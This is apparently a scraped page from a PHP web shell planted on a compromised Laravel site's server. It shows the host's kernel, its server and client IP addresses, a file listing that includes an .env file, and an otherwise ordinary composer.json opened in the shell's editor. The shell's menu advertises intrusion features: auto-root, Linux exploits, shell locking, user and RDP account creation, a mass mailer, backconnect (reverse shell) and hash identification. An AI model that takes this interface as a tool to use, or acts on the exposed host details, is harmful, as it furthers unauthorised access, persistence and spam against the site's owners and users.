Linux webserver.lcwhost.net 5.10.0-12-amd64 #1 SMP Debian 5.10.103-1 (2022-03-07) x86_64
LiteSpeed
: 194.163.130.72 | : 216.73.216.224
Cant Read [ /etc/named.conf ]
7.4.33
admin
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
admin /
domains /
sm.lcwhost.net /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
app
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
bootstrap
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
node_modules
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxr-xr-x
routes
[ DIR ]
drwxr-xr-x
storage
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
.editorconfig
258
B
-rw-r--r--
.env
1.25
KB
-rw-r--r--
.gitattributes
186
B
-rw-r--r--
.gitignore
278
B
-rw-r--r--
.htaccess
759
B
-rw-r--r--
README.md
4.01
KB
-rw-r--r--
artisan
350
B
-rw-r--r--
composer.json
4
KB
-rw-r--r--
composer.lock
522.74
KB
-rw-r--r--
index.php
582
B
-rw-r--r--
package-lock.json
117.88
KB
-rw-r--r--
package.json
982
B
-rw-r--r--
php
0
B
-rw-r--r--
phpunit.xml
1.16
KB
-rw-r--r--
postcss.config.js
91
B
-rw-r--r--
vite.config.js
2.93
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "name": "laravel/laravel", "type": "project", "description": "The skeleton application for the Laravel framework.", "keywords": ["laravel", "framework"], "license": "MIT", "require": { "php": "^8.2", "baileyherbert/envato": "^3.1", "barryvdh/laravel-dompdf": "^3.1", "facebook/php-business-sdk": "^21.0", "fakerphp/faker": "^1.24", "gimucco/tiktok-loginkit": "^0.6.6", "google/apiclient": "^2.18", "hexadog/laravel-themes-manager": "^1.13", "intervention/image": "^3.11", "irazasyed/telegram-bot-sdk": "^3.14", "james-heinrich/getid3": "^1.9", "janu-software/facebook-php-sdk": "^0.3.1", "laravel/framework": "^11.9", "laravel/socialite": "^5.21", "laravel/tinker": "^2.9", "league/csv": "^9.22", "league/flysystem-aws-s3-v3": "^3.29", "livewire/livewire": "^3.5", "maatwebsite/excel": "*", "mhmiton/laravel-modules-livewire": "^3.0", "nwidart/laravel-modules": "^11.1", "openai-php/client": "^0.10.3", "php-ffmpeg/php-ffmpeg": "^1.3", "php-http/guzzle7-adapter": "^1.1", "pusher/pusher-php-server": "^7.2", "smolblog/oauth2-twitter": "^1.1", "socialiteproviders/twitter": "^4.1", "stichoza/google-translate-php": "^5.2", "stripe/stripe-php": "^17.1", "umpirsky/country-list": "^2.0", "yajra/laravel-datatables": "^11" }, "require-dev": { "laravel/pail": "^1.1", "laravel/pint": "^1.13", "laravel/sail": "^1.26", "mockery/mockery": "^1.6", "nunomaduro/collision": "^8.1", "pestphp/pest": "^3.7", "pestphp/pest-plugin-laravel": "^3.0" }, "autoload": { "psr-4": { "App\\": "app/", "Modules\\": "modules/*/app/", "Database\\Factories\\": "database/factories/", "Database\\Seeders\\": "database/seeders/" }, "files": [ "app/Helpers/Helper.php" ] }, "autoload-dev": { "psr-4": { "Tests\\": "tests/" } }, "scripts": { "pre-autoload-dump": "Google\\Task\\Composer::cleanup", "post-autoload-dump": [ "Illuminate\\Foundation\\ComposerScripts::postAutoloadDump", "@php artisan package:discover --ansi" ], "post-update-cmd": [ "@php artisan vendor:publish --tag=laravel-assets --ansi --force" ], "post-root-package-install": [ "@php -r \"file_exists('.env') || copy('.env.example', '.env');\"" ], "post-create-project-cmd": [ "@php artisan key:generate --ansi", "@php -r \"file_exists('database/database.sqlite') || touch('database/database.sqlite');\"", "@php artisan migrate --graceful --ansi" ], "dev": [ "Composer\\Config::disableProcessTimeout", "npx concurrently -c \"#93c5fd,#c4b5fd,#fb7185,#fdba74\" \"php artisan serve\" \"php artisan queue:listen --tries=1\" \"php artisan pail\" \"npm run dev\" --names=server,queue,logs,vite" ] }, "extra": { "laravel": { "dont-discover": [] }, "merge-plugin": { "include": [ "modules/*/composer.json" ] }, "google/apiclient-services": [ "Oauth2", "Drive", "YouTube", "YouTubeAnalytics", "YouTubeReporting", "MyBusinessAccountManagement", "MyBusinessBusinessInformation" ] }, "config": { "optimize-autoloader": true, "preferred-install": "dist", "sort-packages": true, "allow-plugins": { "pestphp/pest-plugin": true, "php-http/discovery": true, "hexadog/laravel-theme-installer": true, "wikimedia/composer-merge-plugin": true } }, "minimum-stability": "stable", "prefer-stable": true }
Close